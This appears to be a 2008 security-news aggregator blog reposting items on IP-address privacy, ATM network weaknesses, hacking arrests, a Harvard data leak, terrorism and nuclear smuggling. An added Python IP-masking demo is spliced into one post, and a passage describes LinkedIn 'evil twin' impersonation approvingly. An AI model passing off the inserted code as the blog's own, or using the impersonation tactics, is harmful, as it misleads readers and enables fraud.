"With dynamic addressing, there are circumstances where an IP address might not be personally identifiable," Mark Rotenberg, the executive director of the Electronic Privacy Information Center (EPIC), told The Reg. "But increasingly, in a vast majority of cases, it is personally identifiable - particularly when it's linked to search queries that are date and time stamped."

Last month, Rotenberg went toe-to-toe with Google global privacy counsel Peter Fleischer in front of the EU parliament, and he's adamant that as time goes on, IP addresses will only get more personal. "This becomes an even bigger problem as we move to the IPv6 environment, which has plenty of address space to uniquely identify actual devices."

What's more, dynamic IP addressing doesn't always prevent personal identification. ISPs typically keep logs of when your address was what, and courts can subpoena this information in much the same way they can subpoena information from Google.

Of course, Alma Whitten goes on to say that Google has done a great deal to guard user privacy in recent months, including "anonymizing" its search logs. Um, last we checked, the company had agreed to anonymize its search logs once they're 18 to 24 months old, and anonymize meant "changing some of the bits" in a stored IP address, making "it less likely that the IP address can be associated with a specific computer or user."

Actually, it's still unclear if this "anonymization" is actually in effect. Back in March, Google said it would happen "within a year's time," and when we asked the company about its progress, it said: "We'll get back to you."
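An added illustration of what the "changing some of the bits" style of anonymization does and does not hide; this is not code from Google or The Register, and the log lines, address masks and prefix lengths are constructed assumptions for the demo.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample search-log lines (not real data): timestamp, client IP, query.
SAMPLE_LOG = """\
2008-02-20T10:01:05Z 203.0.113.47 "cheap flights oslo"
2008-02-20T10:01:31Z 203.0.113.47 "svalbard seed vault"
2008-02-20T10:02:10Z 203.0.113.200 "weather bergen"
2008-02-20T10:05:44Z 2001:db8:85a3::8a2e:370:7334 "ipv6 tutorial"
2008-02-21T09:12:00Z 203.0.113.47 "cheap flights oslo"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) "(.*)"$')


def _prefix_for(addr, v4_keep_bits, v6_keep_bits):
    return v4_keep_bits if addr.version == 4 else v6_keep_bits


def anonymize_ip(ip_text, v4_keep_bits=24, v6_keep_bits=48):
    """Zero the low-order bits of an address (assumed masks: /24 for IPv4, /48 for IPv6).

    This mimics the 'change some of the bits' approach: the stored value is the
    network address of the enclosing prefix rather than the client's real address.
    """
    addr = ipaddress.ip_address(ip_text)
    keep = _prefix_for(addr, v4_keep_bits, v6_keep_bits)
    net = ipaddress.ip_network(f"{addr}/{keep}", strict=False)
    return str(net.network_address)


def anonymity_set_size(ip_text, v4_keep_bits=24, v6_keep_bits=48):
    """How many distinct real addresses collapse onto the same masked value.

    A /24 mask on IPv4 leaves only 256 candidates; that is the whole protection
    the masking provides against re-identification by address alone.
    """
    addr = ipaddress.ip_address(ip_text)
    keep = _prefix_for(addr, v4_keep_bits, v6_keep_bits)
    return 2 ** (addr.max_prefixlen - keep)


def anonymize_log(text, **mask_kwargs):
    """Parse constructed log lines and replace each client IP with its masked form."""
    rows = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip malformed lines rather than guessing at their fields
        ts, ip, query = match.groups()
        rows.append((ts, anonymize_ip(ip, **mask_kwargs), query))
    return rows


def linkable_groups(rows):
    """Group masked records by (masked address, query).

    Masking the address does nothing about the rest of the record: an identical
    query repeated from the same masked prefix on different days is still
    linkable, which is the point EPIC makes about date- and time-stamped queries.
    """
    counts = Counter((ip, query) for _, ip, query in rows)
    return {key: n for key, n in counts.items() if n > 1}


if __name__ == "__main__":
    masked = anonymize_log(SAMPLE_LOG)
    for row in masked:
        print(row)
    print("candidates per masked IPv4:", anonymity_set_size("203.0.113.47"))
    print("still linkable:", linkable_groups(masked))
```

Run as a script it prints the masked records, the 256-address candidate set behind each masked IPv4, and the repeated query that remains linkable across two days despite the masking.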

Whitten also claims that Google has "shortened cookie lengths". But as we've said before, this affects no one but criminals and dead people.

The Dark Side of Light: Brownian Fractals

Via -

Light may not seem very interesting in our everyday lives. But to scientists, light’s properties are a constant source of intrigue. The nature of light as both wave and particle, light as the universal speed limit, and the way light interacts with magnetic fields in the atmosphere to form auroras are just a few examples of light’s fascinating behavior.

Recently, researchers from the University of Glasgow and the University of Bristol in the UK have discovered another unusual property of light – or, more accurately, the darkness within light. As the researchers explain, natural light fields are threaded by lines of darkness, which create optical vortices that appear as black points within the light. The group has modeled this phenomenon, and found that the lines of darkness exhibit fractal properties with Brownian (random) characteristics. Further, the characteristics of these optical vortices suggest universal properties, which could help connect different areas of physics.

Many people have noticed the phenomenon of laser speckle, which occurs when coherent, monochromatic laser light bounces off a rough surface, giving the surface a speckled appearance. The black specks are interference patterns generated by a superposition of highly coherent light waves reflected from different points on the rough surface. Sometimes the speckled pattern can even appear to sparkle when the viewer moves relative to the surface.

In a recent issue of Physical Review Letters, the UK researchers describe how they developed a model of the superpositions that create the dark optical vortices, using numerical simulations and experiments. In their experiments, they created laser speckle with a 10-mm-diameter helium neon laser beam shining through a screen made of ground glass.

By measuring the superpositions with an interferometer, the scientists could generate a 3D map of the structure of the optical vortices. They found two types of vortices. Infinite vortex lines, which account for about 73% of the dark vortices, percolate entirely through the light beam. The remaining 27% of the vortices form closed loops, which occur when a vortex line returns to its starting point within a small enough area.

When investigating the lines of darkness further, the researchers found that they exhibit scale invariance. In other words, the vortices look the same no matter how much you zoom out – they are fractals. Lead author Kevin O’Holleran of the University of Glasgow said that, while he and his colleagues suspected vortex lines to exhibit fractal properties, they were quite surprised to find that the fractality was of a Brownian nature.

One of FBI Most Wanted Appears in Yemen

Via Asharq Alawsat Newspaper -

SAN`A, Yemen, (AP) - A Yemeni-American who is among the FBI's most wanted terrorism suspects appeared in a Yemeni court Saturday and then walked free, an eyewitness said.

Jaber Elbaneh, 41, attended a session of the trial for him and 22 others charged in connection with a series of attacks on oil facilities.

"He entered the courtroom surrounded by four bodyguards, introduced himself to the judge then he left," an eyewitness said speaking on condition of anonymity because of security concerns.

Footage of Elbaneh entering and leaving the court unimpeded also appeared on the Dubai-based pan-Arab satellite channel, al-Arabiya.

Security authorities have declined to comment on Elbaneh's legal situation.

Elbaneh is a former resident of Lackawanna, N.Y. He left the United States in spring 2001 as part of a larger group that authorities said traveled to Osama bin Laden's al-Farooq training camp in Afghanistan.

In May 2003, U.S. prosecutors charged Elbaneh in absentia with conspiring with a group known as the "Lackawanna Six" to provide material support or resources to a foreign terrorist organization.

The U.S. asked Yemen to hand over Elbaneh and while he was subsequently arrested by authorities in January 2004, he was never extradited.

Elbaneh and 22 other prisoners broke out of their Yemeni jail in February 2006 by digging a tunnel to a nearby mosque. Elbaneh surrendered in May to Yemeni authorities but was never sent back to jail despite the ongoing trial.

The U.S. is offering up to $5 million for information leading to his arrest.


Looks like even is looking for him as well...

Bihar Police Seize 4 kg of Uranium Near Nepal Border

Via Rediff India Abroad (Feb 19th) -

The Bihar police have seized four kg of low-grade uranium in the Supaul district near Nepal border and arrested six persons in this connection, sources said on Tuesday.

The seized uranium is estimated to be worth crores of rupees on the international market.

Police sources in the office of the Supaul district superintendent of police confirmed that four kg of low-grade uranium was seized at a bus stop near the Nepal border.

"The police with the active help of SSB jawans deployed on the Indo-Nepal border seized four kg uranium from suspected smugglers," the police said.

The police arrested six persons, including a school teacher, and an SSB jawan posted in Assam.

A senior police official said over the telephone that the police suspect the seized uranium was being smuggled from Meghalaya and that the arrested persons were planning to send it to Nepal.

Pakistan Blocks YouTube for 'Blasphemous' Content

Via Asharq Alawsat Newspaper -

ISLAMABAD (AFP) - Pakistan has ordered all Internet service providers to block the YouTube website for containing "blasphemous" content and material considered offensive to Islam, officials said Sunday.

An inter-ministerial committee has decided to block YouTube because it contained "blasphemous content, videos and documents," a government official told AFP.

"The site will remain blocked till further orders," he said.

Other officials said the site had been blocked because it contained controversial sketches of the Prophet Mohammed which were republished by Danish newspapers earlier this month.

One major service provider, Micronet, said in an email to subscribers that the Pakistan Telecommunications Authority had directed all ISPs to block access to YouTube "for containing blasphemous web content/movies."

"Meanwhile Internet users can write to to remove the objectionable web content/movies because this removal would enable the authorities to order un-blocking of this website," the email said.

Saudi Men Arrested for Flirting

Via BBC -

Prosecutors in Saudi Arabia have begun investigating 57 young men who were arrested on Thursday for flirting with girls at shopping centres in Mecca.

The men are accused of wearing indecent clothes, playing loud music and dancing in order to attract the attention of girls, the Saudi Gazette reported.

They were arrested following a request of the Commission for the Promotion of Virtue and Prevention of Vice.

The mutaween enforce Saudi Arabia's conservative brand of Islam, Wahhabism.

Earlier in the month, the authorities enforced a ban on the sale of red roses and other symbols used in many countries to mark Valentine's Day.

The ban is partly because of the connection with a "pagan Christian holiday", and also because the festival itself is seen as encouraging relations between the sexes outside marriage, punishable by law in the kingdom.

The Prosecution and Investigation Commission said it had received reports of such "bad" behaviour by 57 young men at a number of shopping centres in the holy city of Mecca, the Saudi Gazette said.

The guardians of some of the men defended their actions, however, saying they would regularly get together at the weekend to have fun without ever violating laws governing the segregation of the sexes, it added.

Banks Failing on ATM Security

Via -

Banks and financial institutions are leaving customers' personal details vulnerable to hackers by failing properly to secure their ATMs, according to a new report.

Managed security firm Network Box cited three main threats to ATMs: IP worms, disruption of the IP network and denial of service, and the harvesting of transaction data for malicious purposes.

The company said that ATM security risks have increased because of the changing ways in which they operate.

Many ATMs were built on proprietary hardware, software and communications protocols.

But it is estimated that 70 per cent of current ATMs are based on PC/Intel hardware and commodity operating systems using standard IP networking with some additional peripherals housed in a secure vault-like box.

The report attributes the changes to advantages in cost, performance, flexibility, standardisation and functionality, but points out that these advantages bring increased threats.

In these newer systems the ATM is connected to the payment processor using a TCP/IP connection. However, while the PIN is triple-DES encrypted, the messages themselves are not.

This leaves card numbers, expiry dates, transaction amounts and account balances clearly readable.

A hacker needs only to access some part of the IP network between the IP-ATM and the payment processor to gather the details.

Saturday, February 23, 2008

802.11 Attacks - Foundstone Whitepaper

I have been working with 802.11 wireless technologies for a couple years now and although things are starting to improve, I still do not see many step by step or “How to” guides that give detailed instruction on performing 802.11 wireless attacks ( aside). The focus of this whitepaper is to provide a step by step walkthrough of popular wireless attacks. There are some areas where I just point you in the right direction, usually towards the right tool, but ideally, these areas will be further described and covered in the next release of the paper. By understanding the mindset and methodologies an attacker uses, we can better defend against those attacks. Although I’ll provide a brief background into 802.11, this paper should not serve as a comprehensive guide to the 802.11 standard, but instead should provide you with adequate information to understand 802.11 attacks. I’ll continue to update this paper as I further experiment with new attacks, so please stay tuned for updates.

More Arrests in Morocco Plot

Via Al-Jazeera -

A total of 35 people, members of the al-Badil al-Hadari (Civilised Alternative), an Islamist party, have now been arrested in Morocco, over an alleged plot to conduct political assassinations and carry out crimes internationally.

Police also linked its leader to an alleged "terrorist network".

"Based on information provided by individuals in custody, a [new] stock of explosives and detonators had been found in a hideout in Nador [northern Morocco]," a police source said.

Nine Kalashnikov rifles, two machine-guns, seven machine-pistols, 16 handguns and an arsenal of explosives and detonating devices were already seized earlier this week as 32 alleged members of the group were taken into custody on Monday and Tuesday.

Mustapha Moatassim, the party's secretary-general, was among those arrested. Abdelhafid Sriti, correspondent for Al Manar television in Morocco, was also detained.

Mohamed Ayyadi, spokesperson for al-Badil al-Hadari, said: "For us, it is astonishing news because since we founded our party we have made it clear that democracy is our goal and we have proved that ... we were among the first parties to condemn al-Qaeda and the use of violence in politics."

The detainees are accused of planning to kill senior army officers, government ministers and some Moroccan Jews, Chakib Benmoussa, the interior minister, announced on Wednesday.

He told a news conference: "The network has a two-pronged strategy: one for political activity, with al-Badil al-Hadari as its public face, and another clandestine focusing on military action.

"The network set up a military wing named Special Action Group."

Benmoussa said the party had links with an organisation called the Moroccan Islamic Combatant Group (GICM) and Algeria's Salafist Group for Preaching and Combat (GSPC), which last year changed its name to the Al-Qaeda Organisation in the Islamic Maghreb.

According to Benmoussa, the network had contacts with al-Qaeda in Afghanistan in 2001.

US Diplomats Say Deposed Judges Issue is Internal Pakistan Matter

Via (Pakistan) -

ISLAMABAD: The United States has now decided to respect the wishes of Pakistani voters and has finally given a go-ahead to the two main winners to resolve all the issues according to the wishes of their voters, including the issue of the deposed Supreme Court judges. US diplomats, who met some top leaders of PPP and PML-N in the last two days, have conveyed the view that the restoration of the deposed judges was an internal issue of Pakistan and the US would not interfere in any internal political or legal issue.

Spokesperson of the US Embassy in Pakistan, Elizabeth Colton, made it clear on Friday that US diplomats were meeting the politicians just to understand the ground situation and for supporting the democracy.

She said: “The US ambassador and other US Embassy officials regularly meet with representatives of various political parties, and continue to do so. We continue to express our support of the democratic transition.”

When The News asked why the US considered Musharraf indispensable for its interests in Pakistan, she responded: “Through the electoral process, the Pakistani people have expressed their views. It is up to those elected to form a government. We hope that Pakistan’s political leaders will work together to advance a common agenda and meet the challenges ahead. We look forward to working with that government, whoever its leaders will be.”

Observers said it was clear that the Zardari-Nawaz alliance announced on Thursday night had forced the US to change its position on supporting Musharraf, who had announced a few days ago that restoration of the judges was not possible.

In response to a question as to why the US is opposing the restoration of Justice Iftikhar Muhammad Chaudhry and some other judges, spokesperson Colton said: “The United States has stated its support for an independent media and an independent judiciary. Pakistan’s judicial issue is a matter for Pakistanis to address.” It is learnt that Bush administration conveyed serious reservations about Justice Iftikhar Muhammad Chaudhry to the leadership of the PPP when late Benazir Bhutto had announced her support for the deposed CJ.

After the surprising election results, US officials started meeting PPP and PML-N leaders and listened to their views on the restoration of judges. PML-N said that if some American judges could release prisoners from Guantanamo Bay, then why could a Pakistani judge not order the release of a person who was thrown behind bars many years ago without any charge being proved against him.

Malaysian Bloggers Warned & Being Monitored

Via -

A Malaysian government minister has accused bloggers, who have been writing avidly on upcoming elections, of being cowards and warned they are being monitored, a report said Friday.

Youth and Sports Minister Azalina Othman said opposition parties were using blogs to get their message out because they believed the Home Affairs Ministry was busy monitoring reports in the mainstream media, the Star daily said.

"They think they can get away with it but it is not the case as they too are being monitored," she reportedly said, adding that bloggers were cowards and a nuisance to the ruling party.

Opposition parties have resorted to blogs, SMS messaging and YouTube in their campaign for the March 8 polls, to dodge a virtual blackout on mainstream media.

Major newspapers and television stations -- many partly owned by parties in the ruling coalition -- have given blanket coverage to the government and its achievements since the election was called.

The opposition parties rate barely a mention, but thanks to the Internet they have begun campaigning feverishly in cyberspace with the aim of reaching young, urban, educated voters.

Media watchdog Reporters Without Borders ranks Malaysia 124 out of 169 on its worldwide press freedom index, and says the main media are "often compelled to ignore or to play down the many events organised by the opposition".

The government has previously threatened that bloggers could be punished under draconian internal security laws which provide for detention without trial.

DoE Starts Work on Exascale Supercomputer

Via Gov Computer News -

Two Energy Department labs are building a supercomputer that will be capable of executing more than one quintillion floating-point operations/sec, or one exaflop, the department announced this week.

Sandia National Laboratories and Oak Ridge National Laboratory are collaborating on the system. Congress has allotted $7.4 million for the project in fiscal 2008.

The computer will work on tough scientific problems, such as modeling how large numbers of particles interact with one another.

“An exascale computer is essential to perform more accurate simulations that, in turn, support solutions for emerging science and engineering challenges in national defense, energy assurance, advanced materials, climate and medicine,” said James Peery, Sandia's director of computation, computers and math, in a statement.

The plan to build an exaflop computer is an ambitious one. In comparison, an exaflop is 1,000 times faster than a petaflop, which is 1,000 trillion flops.

No existing supercomputer system has achieved petaflop performance yet, though the National Science Foundation has funded IBM to build such a machine.

Today's fastest supercomputer, Lawrence Livermore National Laboratory's BlueGene/L System, has a processing speed of 478.2 trillion teraflops.


The fastest publicly known supercomputer, that is...

Friday, February 22, 2008

World's First Wooden Sports Car Unveiled

Via People's Daily Online (China) -

A U.S. design company has created the world's first wooden supercar, which would put both Porsche and Lamborghini in the shade with a staggering top speed of 240 mph, media reported Thursday.

The 4.6 meter-long, two-seater "Splinter" car, made from maple, plywood and MDF, has a 4.6 liter V8 petrol engine and a six-speed gearbox.

It weighs 1,134 kilograms -- 240 kilograms less than the lightweight Porsche 911 GT3. Despite its power, it will achieve 20 mpg, according to its designer, Joe Harmon, 27.

"Wood is a truly amazing material to work with," Harmon said.

"It has a higher strength-to-weight ratio than aluminium or steel, and it possesses a versatility that makes many different types of construction techniques possible."

The car is due to hit the road later this year. The design company, Joe Harmon Design, has not yet decided on a price for the supercar.


Find out more information about this project at

Thursday, February 21, 2008

Microsoft Releases Office File Format Specifications

Microsoft, in accordance with its Open Specification Promise, has released the following file specifications to the public.

Word 97-2007 Binary File Format (.doc) Specification
PowerPoint 97-2007 Binary File Format (.ppt) Specification
Excel 97-2007 Binary File Format (.xls) Specification
Excel 2007 Binary File Format (.xlsb) Specification
Office Drawing 97-2007 Binary Format Specification

This is good news for open source developers who want to build products that work with these file types (think OpenOffice, etc), but the release of these file format details is sure to grab the attention of vulnerability hunters as well.

File fuzzers can now be tuned to the exact file specification, thus increasing their efficiency in finding possible security issues.

This is going to be an interesting topic to watch....

Missile Hits Dying US Spy Satellite

Via Washington Post -

WASHINGTON -- A missile launched from a Navy cruiser soared 130 miles above the Pacific and smashed a dying and potentially deadly U.S. spy satellite Wednesday, the Pentagon said. Several defense officials said it apparently achieved the main aim of destroying an onboard tank of toxic fuel.

Officials had expressed cautious optimism that the missile would hit the satellite, which was the size of a school bus. But they were less certain of hitting the smaller, more worrisome fuel tank, whose contents posed what Bush administration officials deemed a potential health hazard to humans if it landed intact.

In a statement announcing that the attack on the satellite, the Pentagon said, "Confirmation that the fuel tank has been fragmented should be available within 24 hours." It made no mention of early indications, but several defense officials close to the situation said later that all indications point to the destruction of the fuel tank. One explained that observers saw what appeared to be an explosion, indicating that the tank was hit.

Because the satellite was orbiting at a relatively low altitude at the time it was hit by the missile, debris will begin to re-enter the Earth's atmosphere immediately, the Pentagon statement said.

"Nearly all of the debris will burn up on re-entry within 24-48 hours and the remaining debris should re-enter within 40 days," it said.

The Six Golden Flowers - China’s Female Hackers

Via The Dark Visitor -

It is rare to find mention of the role women play in Chinese hacker society, so I was surprised to find a page dedicated to the “Six Golden Flowers.” The text written on the pictures gives a small history of their years in hacking but little else.

Digging a little further showed that in 2007, security media sources inside China named one of the members of the “Six Golden Flowers” as the most active and influential Chinese hacker in the country.


Thanks to pdp @ GNUCITIZEN for the link.

International Hacking Network Busted in Canada

Via cbcNews -

Quebec provincial police say they've dismantled a computer hacking network that targeted unprotected personal computers around the world.

Police raided several homes across Quebec on Wednesday and arrested 16 people in their investigation, which they say uncovered the largest hacking scam in Canadian history.

The hackers collaborated online to attack and take control of as many as one million computers around the world that were not equipped with anti-virus software or firewalls, said provincial police captain Frederick Gaudreau.

"That way, they were able to introduce some Trojans or worms in those computers, and that way they were able to take control of the computers from abroad," he said at a Montreal news conference on Wednesday.

The majority of computers attacked by the network were in Poland and Brazil, but some PCs in Manitoba and the United States were also hacked, he said.

Several government computers were also compromised, but investigators will not say in which country.

The computers were used to set up fake websites that solicited users to click on them and provide personal information, Gaudreau said.

Police won't reveal what the information was used for but investigators estimate that the network profited by as much as $45 million.

The 14 suspects arrested Wednesday are between the ages of 17 and 26, and face charges related to the unauthorized use of computers.


Sounds like a phishing / botnet ring....

Wednesday, February 20, 2008

The Growing Challenge of Fighting Terrorist Financing

The United States and its allies have made considerable progress in tackling terrorist financing since 9/11 -- one of the few areas of success in the global counterterrorism efforts. Serious challenges have emerged, however, which could threaten the record to date. As governments have cracked down on terrorist financing, the growing number of terrorist cells and organizations have found new ways to raise, store, and move funds. Keeping pace with these rapid changes is an uphill struggle for government bureaucracies. International cooperation on these issues also continues to decrease as 9/11 grows more distant. Additionally, in spite of some positive steps taken by the Persian Gulf countries, the region remains a key source of terrorist funds, and European efforts in this area are still uneven. Addressing all of these issues will be essential for continued success in combating terrorist financing.


This is a pretty good Op-ed piece by Michael Jacobson, a senior fellow in The Washington Institute's Stein Program on Counterterrorism and Intelligence. He is author of The West at War: U.S. and European Counterterrorism Efforts, Post-September 11 and previously served as a senior advisor in the Treasury Department's Office of Terrorism and Financial Intelligence.

In addition, he is a Contributing Expert @

Dallas Police Web Site Hacked, Defaced

Via FoxNews -

DALLAS — The Dallas Police Department Web site was shut down Monday night after a hacker took over the site with anti-American rants. Whoever hacked into the site also posted a doctored photograph showing American troops watching over four people lined up against a wall.

Each of the four prisoners had lines leading away from their faces to individual head shots of President Bush, Vice President Dick Cheney, Secretary of State Condoleezza Rice and Sen. John McCain, according to Dallas-Fort Worth television station KTVT.

"My understanding is that no internal police data has been affected," police spokesman Lt. Vernon Hale said.

Hale said the department's technology staff will work to get the site back up. He said he was unaware of hackers ever taking over the site before.

IBM Experimenting With DNA to Build Chips

Via ZDNet -

Scientists at IBM are conducting research into arranging carbon nanotubes--strands of carbon atoms that can conduct electricity--into arrays with DNA molecules. Once the nanotube array is meticulously constructed, the laboratory-generated DNA molecules could be removed, leaving an orderly grid of nanotubes. The nanotube grid, conceivably, could function as a data storage device or perform calculations.

"These are DNA nanostructures that are self-assembled into discrete shapes. Our goal is to use these structures as bread boards on which to assemble carbon nanotubes, silicon nanowires, quantum dots," said Greg Wallraff, an IBM scientist and a lithography and materials expert working on the project. "What we are really making are tiny DNA circuit boards that will be used to assemble other components."

The work, which builds on the groundbreaking research on "DNA origami" conducted by California Institute of Technology's Paul Rothemund, is only in the preliminary stages. Nonetheless, a growing number of researchers believe that designer DNA could become the vehicle for turning the long-touted dream of "self-assembly" into reality.

Chips made with these procedures could also be quite small. Potentially, DNA could address, or recognize, features as small as two nanometers. Cutting-edge chips today have features that average 45 nanometers. (A nanometer is a billionth of a meter.)


Technosorcery at its best!

Wikileaks Down, But Not Out

Via Guardian Unlimited Blog -

It was inevitable, given the nature of the site, that the 'whistleblowing service' Wikileaks would find itself the subject of a legal injunction.

From the start, the site had readied itself by setting up servers in Belgium and India as well as the US but, as they said yesterday, they "never expected to be using the alternative servers to deal with censorship attacks from, of all places, the United States".

The site was shut down by California district court judge Jeffrey White after Swiss investment bank Julius Baer obtained an injunction; the site had published several hundred pages of information that alleged the bank was involved in money laundering and tax evasion in the Cayman Islands. The information was posted anonymously on Wikileaks - the site's modus operandi - but is believed to be from a former employee who is the subject of a court case.


It appears that mirror sites are up and working.

Read more about this case over at Computerworld.

"It seems to me the judge may not have fully understood the way the Internet works and has issued an order that is overly broad and violative of First Amendment rights," said David Ardia, director of the Citizen Media Law Project at Harvard Law School.

Japan Brings Down Godzilla of Spam

Via The Register -

Japanese police have arrested a "prolific spammer" who allegedly bombarded inboxes with hundreds of millions of messages punting internet gambling and dating sites.

Investigators reckon Yuki Shiina, 25, sent as many as 2.2 billion spam messages using what appear to be rudimentary spamming techniques. He allegedly purchased a list of 600,000 email addresses for a pricey ¥100,000 ($927), earning ¥2m ($18,540) through a subsequent spamming campaign, security vendor Sophos reports.

Shiina reportedly faked the message headers of junk mail he sent in a bid to avoid detection, an offence against local anti-spam laws. There's no mention of the use of compromised machines to send spam - standard practice for junk mail scumbags over recent years, and a powerful technique to frustrate both basic spam blocking and investigatory techniques.

Complaints from a local ISP over the volume of junk mail it was processing resulted in an investigation that led to Shiina's arrest by Tokyo's finest.

American Women Charged With Smuggling

Via FoxNews -

American mom Marisa Ann Sketo-Kirsh appeared in a South African court Jan. 28 for negotiating the sale of spark plugs. Yes, you read right — spark plugs. Her charge: importing and exporting “components of nuclear devices.”

It may be surprising to some that a common, everyday spark plug — or the igniter of a spark plug to be more precise, called a trigger spark gap — could be a weapon of mass destruction. Here’s why:

A spark gap is a cylinder set on a 4-inch square black box that emits an intense electrical pulse, whose timing and duration are controlled to the microsecond.

Hospitals use the devices to power lithotripters to deliver an electrical pulse that breaks up kidney stones.

These triggered spark gaps, however, also have another use: to detonate a nuclear bomb. Each of the switches could be installed into an enriched uranium casing, which could be mounted on a ballistic missile — with a consequence of … well, you know the rest.

This South African case is a sneak peek into the murky and sometimes dangerous world of black-market nuclear weapons proliferation, teeming with underworld movers and shakers, and maybe even terrorists. Items being sold here are not the stuff of Hollywood — glowing bits of enriched nuclear material — but dull-looking industrial parts that have viable commercial value but can also be used for military purposes. The U.S. government calls these “dual use” items.

Police in South Africa allege the 46-year-old Sketo-Kirsh, aka Marisa Sketo, ordered 66 spark gaps from the U.S. firm PerkinElmer Optronics. She is believed to be working for and with Asher Karni, owner of Top Cape Technology company in South Africa. Sketo-Kirsh is thought to have sent the spark gaps to a Pakistani company without first obtaining a permit from South Africa’s WMD Nonproliferation Council.

According to the U.S. Justice Department, Karni, an Israeli Orthodox Jew, was cutting a deal with Humayun Khan from Islamic Pakistan in summer 2003 to export 200 spark gaps. These devices are easily concealed as they are small enough to fit into a coat pocket. The innocuous looking switches combined can pack enough punch to detonate 3-10 nuclear bombs, according to experts.

Its intended users, according to prosecutor Jay Bratt, were Pakistan and its arch rival, India.

Harvard Site Hacked and Leaked Onto PirateBay

Via DailyApps -

The website of the Harvard Graduate School of Arts and Sciences seems to have had what you would call a major security breach. The whole of the website, complete with server backups, student databases, site databases, and the complete directory structure, has been leaked onto BitTorrent.

At the time of writing this, a 125MB Zip File is being tracked by Pirate Bay.

According to Torrentfreak, the Harvard University website has become a victim of a major security breach. A Torrent that is currently available on Piratebay claims to be a complete backup of the Website of Graduate School of Arts and Sciences.

The Torrent basically contains a 125MB Zip file that contains the entire directory structure of the site, and the major database backups. Details of the databases are below:

joomla.sql - claims to be the database for the Harvard site
contacts.sql - claims to be a database of contacts
hgs.sql - stated as ‘other minor thing’

Here’s what the release notes from the Torrent read, in broken English: ”Maybe you don’t like it but this is to demonstrate that persons like tgatton(admin of the server) in they don’t know how to secure a website.”

The guy basically refers to Thomas Gatton, Systems Administrator and User Support Specialist at Harvard. Not much is known about the reason behind the security breach. Also, at the moment, the site that was hacked seems to be down.

I am waiting for Harvard to come out with a clear explanation as to what is happening. At the moment the files contained in the Zip seem to be the real deal.



There really isn't another way to spin this story.

Harvard can't claim that the attacker didn't access the database on the site if he downloaded the whole thing and then handed it to everyone in the world.

Tuesday, February 19, 2008

National Consumer Council Finds Unfair EULAs

Via BBC -

The National Consumer Council (NCC) has accused 17 firms, including Microsoft, Adobe and Symantec, of using unfair "end user licence agreements" (EULAs).

The NCC has asked the Office of Fair Trading to launch an investigation.

The NCC said the firms' EULAs were misleading customers into "signing away legal rights".

"Software rights-holders are shifting the legal burden on to consumers who buy computer programmes, leaving them with less protection than when they buy a cheap Biro," said Carl Belgrove of the NCC.

"Consumers can't have a clue what they're signing up to when some terms and conditions run to 10 or more pages.

"There's a significant imbalance between the rights of the consumer and the rights of the holder," he added.

'Legal responsibility'

As one of the firms named by the NCC, Microsoft said it had not seen the details of the report and was unable to comment.

But it added that it was committed to dealing "fairly" with consumers and addressing any concerns they might have.

The NCC looked at 25 software packages and said that in 17 instances, the packaging did not tell potential buyers they would have to sign an EULA in order to use it.

While some contained the EULA inside an instruction manual, or let it be read online, this was only after the software had been bought.

"This means that consumers are unable to make informed decisions before they buy a product, yet are being forced to take on an unknown level of legal responsibility," said the NCC.

After examining the contents of the EULAs, the NCC also said that some contained potentially unfair clauses.

Monday, February 18, 2008

Introduction to Social Networks Evil Twin Attacks

Via -

Let's have a look at a social network like LinkedIn. For those of you who don’t know what LinkedIn is, let me say that it is probably the largest professional social network available today. Once you give information about your place of work and the education centers you used to attend, LinkedIn will try its best to hook you up with everyone else who has been associated with your current company, university, etc. The benefit is obvious: you keep up with people who may help you in the future. However, nothing stops an evil mind from registering an account in the name of John Dawson, a reputable IT security expert, currently employed by HSBC, Canary Wharf, London. If the evil twin of John Dawson inhabits LinkedIn, how many people will trust that shady persona and as such be fooled into one of the biggest scams? I find this question very interesting and quite fascinating from the hacker point of view.

The hack here is not technical but rather psychological. Remember, hacking is the action of outsmarting others and as such it may take any form. Fooling people’s beliefs is an important craft that has been with us since the dawn of humanity, yet we often fail to acknowledge its effectiveness. This is what Evil Twin attacks are all about. From the WiFi security perspective the evil twin is the rogue access point that pretends to be a friendly network. From the social networks point of view, the evil twin is a hacker or a bot masquerading as the real person.

Social Networks Evil Twin Attacks work both ways. First, the impersonator will be given the chance to trick the victim’s current friends into a trap. Second, he will trick people who try to contact the real person along the way into a trap as well. Therefore, if the evil John Dawson is approached by someone who is looking for work in his sector, he will be in a very comfortable position to gain internal insights into that person's company, as people very often volunteer juicy information during the interviewing process.

Social Networks are a huge threat whether you realize it or not. The bad guys are not restricted in terms of the types of tools they use for their malicious activities, the way whitehats are, since this seems to be part of technical eliteness. The bad guys will break into the targeted network by any means necessary. This includes fooling people, lying and cheating on their way towards their goal.

Cayman Islands Bank Gets Wikileaks Taken Offline in U.S.

Via -

Wikileaks, the whistleblower site that recently leaked documents related to prisons in Iraq and Guantanamo Bay, was taken offline last week by its U.S. host after posting documents that implicate a Cayman Islands bank in money laundering and tax evasion activities.

In a pretty extraordinary ex-parte move, the Julius Baer Bank and Trust got Dynadot, the U.S. hosting company for Wikileaks, to agree not only to take down the Wikileaks site but also to "lock the domain name to prevent transfer of the domain name to a different domain registrar." A judge in the U.S. District Court for Northern California signed off on the stipulation between the two parties last week without giving Wikileaks a chance to address the issue in court.

The Julius Baer Bank, a Swiss bank with a division in the Cayman Islands, took issue with documents that were published on Wikileaks by an unidentified whistleblower, whom the bank claims is the former vice president of its Cayman Islands operation, Rudolf Elmer. The documents purport to provide evidence that the Cayman Islands bank helps customers hide assets and wash funds.

After failing to convince Wikileaks to take down the documents, the bank went after its U.S. hosting service, which responded by agreeing not only to remove the Wikileaks account from Dynadot's server but also to help prevent Wikileaks from moving its site to a different host.

Julie Turner, an attorney in California who represented Wikileaks prior to this latest litigation but is not counsel for the group on this matter, is surprised that the court sanctioned such a broad agreement.

"It’s like saying that Time magazine published one page of sensitive material so (someone can) seize the entire magazine and put a lock on their presses," she says.

Turner says she had been speaking with the bank last month on Wikileaks' behalf when the negotiations fell through.

"The bank wanted the documents taken down and Wikileaks was not prepared to do so. It was a pretty short negotiation," she says.

IKEA & Lego

Anyone see the resemblance?



Photo of the Day - Singapore Air Force

Via BBC -

F-16 jets from the Republic of Singapore Air Force (RSAF) perform stunts during a rehearsal for an aerobatics display at the Singapore Airshow.


Very Top Gun-ish.

DeepSec 2007 - RPC Auditing Tools and Techniques

